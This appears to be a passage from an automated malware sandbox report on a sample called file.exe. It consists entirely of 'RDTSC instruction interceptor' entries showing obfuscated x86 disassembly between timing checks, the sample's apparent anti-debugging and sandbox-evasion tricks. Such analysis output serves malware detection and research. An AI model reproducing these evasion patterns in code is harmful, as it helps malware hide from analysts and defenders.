                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC02A2 second address: EC02A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0352 second address: EC0378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0378 second address: EC03AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnp 00007F4178B56570h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC03AD second address: EC040C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F417883CDCCh 0x0000000f popad 0x00000010 pop eax 0x00000011 movsx edx, si 0x00000014 push 00000003h 0x00000016 mov cx, di 0x00000019 jo 00007F417883CDCCh 0x0000001f mov esi, dword ptr [ebp+122D38A1h] 0x00000025 push 00000000h 0x00000027 jmp 00007F417883CDD8h 0x0000002c push 00000003h 0x0000002e and ecx, dword ptr [ebp+122D37F1h] 0x00000034 push 99679D22h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC040C second address: EC0413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0413 second address: EC0418 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0418 second address: EC0484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 269862DEh 0x0000000e jmp 00007F4178B56578h 0x00000013 lea ebx, dword ptr [ebp+124521FEh] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F4178B56568h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 jmp 00007F4178B5656Ah 0x00000038 mov ecx, dword ptr [ebp+122D2303h] 0x0000003e xchg eax, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F4178B5656Bh 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0484 second address: EC04A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F417883CDDAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC04A7 second address: EC04AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0526 second address: EC05B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5DC54728h 0x00000010 mov dword ptr [ebp+122D2090h], edx 0x00000016 push 00000003h 0x00000018 pushad 0x00000019 and edx, dword ptr [ebp+122D21FDh] 0x0000001f pushad 0x00000020 push edx 0x00000021 pop edx 0x00000022 mov esi, edx 0x00000024 popad 0x00000025 popad 0x00000026 push 00000000h 0x00000028 mov di, dx 0x0000002b push 00000003h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F417883CDC8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 jmp 00007F417883CDCEh 0x0000004c adc edi, 5ED00E51h 0x00000052 je 00007F417883CDCAh 0x00000058 mov cx, 1275h 0x0000005c push 917EE9C9h 0x00000061 push eax 0x00000062 push edx 0x00000063 jnl 00007F417883CDC8h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC05B4 second address: EC05CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4178B56577h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC05CF second address: EC0618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 517EE9C9h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F417883CDC8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 lea ebx, dword ptr [ebp+12452207h] 0x0000002f mov edi, dword ptr [ebp+122D3929h] 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jng 00007F417883CDCCh 0x0000003e jnp 00007F417883CDC6h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0618 second address: EC0640 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B5656Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F4178B56570h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0640 second address: EC0644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0735 second address: EC0739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0739 second address: EC073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC073F second address: EC0745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0745 second address: EC076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f ja 00007F417883CDD0h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC076F second address: EC077D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC077D second address: EC0784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0784 second address: EC0799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jp 00007F4178B56574h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0799 second address: EC079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41A65 second address: D41A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA9ACC second address: EA9AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF1D5 second address: EDF1EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4178B56575h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF1EE second address: EDF1F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF485 second address: EDF48B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF48B second address: EDF498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF61D second address: EDF625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF625 second address: EDF639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F417883CDC6h 0x0000000a jmp 00007F417883CDCAh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF90A second address: EDF91E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B5656Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF91E second address: EDF930 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F417883CDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF930 second address: EDF947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4178B56566h 0x0000000a popad 0x0000000b jns 00007F4178B5656Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDFD27 second address: EDFD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDFD31 second address: EDFD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4178B56566h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDFD3C second address: EDFD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD4h 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jg 00007F417883CDC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDFD5D second address: EDFD76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4178B56566h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jc 00007F4178B56566h 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE02FD second address: EE030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE030C second address: EE0310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0310 second address: EE0314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0468 second address: EE048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4178B56571h 0x00000009 popad 0x0000000a jmp 00007F4178B5656Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE048C second address: EE0498 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0498 second address: EE049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE0751 second address: EE075D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3003 second address: EE3009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6599 second address: EE659D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA7F5C second address: EA7F6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B5656Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEEB4D second address: EEEB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F417883CDC6h 0x0000000a pop esi 0x0000000b jmp 00007F417883CDD9h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEED6D second address: EEED8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 jc 00007F4178B56584h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F4178B56570h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0DD4 second address: EF0DD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF14CF second address: EF14E9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4178B5656Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF165A second address: EF1660 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1743 second address: EF1747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF196B second address: EF1979 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F417883CDC6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1979 second address: EF197D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF197D second address: EF1999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F417883CDD2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1AFB second address: EF1B10 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F4178B56566h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1B10 second address: EF1B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1B14 second address: EF1B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F4178B5656Ch 0x0000000c jns 00007F4178B56566h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F4178B56568h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 push edx 0x00000032 jbe 00007F4178B56566h 0x00000038 pop edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1B53 second address: EF1B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1B59 second address: EF1B67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2AC1 second address: EF2AC6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3BDF second address: EF3BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF450C second address: EF4527 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F417883CDCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F417883CDC8h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF42E0 second address: EF42F2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF42F2 second address: EF42F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF45D4 second address: EF45D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF678A second address: EF6790 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7391 second address: EF7396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7396 second address: EF73AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jp 00007F417883CDC6h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF73AC second address: EF73B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7E8B second address: EF7E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9F46 second address: EF9F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF869A second address: EF869E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9F4A second address: EF9F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9F50 second address: EF9F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F417883CDC6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F417883CDC6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBEA4 second address: EFBEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBEAA second address: EFBEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBEAF second address: EFBEB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBEB4 second address: EFBEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB04C2 second address: EB04D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F4178B56566h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB04D0 second address: EB04E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB04E5 second address: EB0507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push esi 0x00000008 jne 00007F4178B56572h 0x0000000e jo 00007F4178B5656Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFEFEC second address: EFEFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF5C4 second address: EFF5D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF5D1 second address: EFF5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF684 second address: EFF691 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0060E second address: F00612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0160B second address: F01652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F4178B56568h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov dword ptr [ebp+122DB72Ch], edi 0x00000029 push 00000000h 0x0000002b add dword ptr [ebp+122D2727h], esi 0x00000031 push eax 0x00000032 pushad 0x00000033 ja 00007F4178B56568h 0x00000039 push eax 0x0000003a push edx 0x0000003b jp 00007F4178B56566h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F007FE second address: F00802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F00802 second address: F00808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
